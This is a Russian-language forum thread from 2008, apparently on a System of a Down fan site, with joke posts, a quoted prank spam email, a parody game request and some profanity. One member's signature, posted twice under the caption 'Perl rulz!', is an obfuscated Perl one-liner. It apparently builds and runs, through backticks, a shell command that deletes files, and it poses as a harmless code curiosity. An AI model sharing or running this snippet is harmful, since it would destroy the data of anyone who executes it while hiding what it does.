Добавлено: Вт Мар 04, 2008 11:54 pm Заголовок сообщения:
Как я понял мало сообщений на одной странице. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Ср Мар 05, 2008 12:14 am Заголовок сообщения:
Вопрос обращён к тем,кого собственно не устраивает. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Вс Апр 13, 2008 11:07 am Заголовок сообщения:
From: Пётр Климашевский <ar13s>
To: aluserex@aol.com
Sent: Sun, 13 Apr 2008 5:55 am
Subject: [no topic]
Цитата:
>Уважаемый %USERNAME%!!!!11
>От имени Администрации проекта SoaDpage, прошу продемонстрировать Ваше
>присутствие.
>Желательно в голом виде на email: aluserex@aol.com
>С Уважением, Maynard.
Здраствуйте. Я, Кирилл. Хотел бы чтобы вы сделали игру, 3Д-экшон суть такова+
Пользователь может играть лесными эльфами, охраной дворца и злодеем. И если
пользователь играет эльфами то эльфы в лесу, домики деревяные набигают солдаты
дворца и злодеи. Можно грабить корованы+ _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Вс Апр 13, 2008 11:31 am Заголовок сообщения:
Здрасте Вам )
тут письмецо пришло на мыло ) я осознаю что это видимо спам, но я бы не поделился если бы не выпал под стол от контекста ) или это дейсвтительно рассылка централизованная? ) тогда у вас не работает переменная юзернэйм ) ну перейду к сути )
Цитата:
Это письмо отправлено вам администратором сайта "Scars on SoaDpage". Если это сообщение является спамом, содержит оскорбления или прочие неприятные вам комментарии, пожалуйста свяжитесь с вебмастером по адресу:
Уважаемый %USERNAME%!!!!11
От имени Администрации проекта SoaDpage, прошу продемонстрировать Ваше присутствие.
Желательно в голом виде на email: aluserex@aol.com
С Уважением, Maynard.
_________________ Fortuna non penis in manus non recipe
Что тут вообще происходит я не пойму. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Пн Сен 08, 2008 11:33 pm Заголовок сообщения:
ИМХО было бы неплохо,если бы показывался род пользователя. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Пн Сен 08, 2008 11:39 pm Заголовок сообщения:
Злая, смешная шютка, дамы и господа _________________ Купил казак Мамай видак,
крутил его и так, и сяк.
Морали в этой басне нету,
купил видак - купи касету!
Добавлено: Пн Сен 08, 2008 11:39 pm Заголовок сообщения:
базу данных влом ебошить
уже пытались както сделать погоду, пол, знак зодиака... форум слетел нахуй.. _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Зарегистрирован: 31.05.2007 Сообщения: 2448 Откуда: Ахметов-сити, UA
Добавлено: Пн Сен 15, 2008 6:12 pm Заголовок сообщения:
нас снова 667, надо что-то делать _________________ Скажи, что я ее люблю... Без нее вся жизнь равна нулю, из-за нее вся жизнь равна нулю... (с) А.Васильев
У тоб? так багато стор?н, я просто не розум?ю... Я просто хочу спитати тебе, чому ти наст?льки красива!?... (с) Олег Собчук
Цитаты дня:
xxx
Я много зарабатываю
xxx
Я работаю ртом
xxx
Я певица
yyy
а с личной жизнью все в порядке?
zzz
угу, еще как! Полный порядок. Мы никогда не ссоримся, не надоедаем друг другу и вообще во всем абсолютное согласие и единение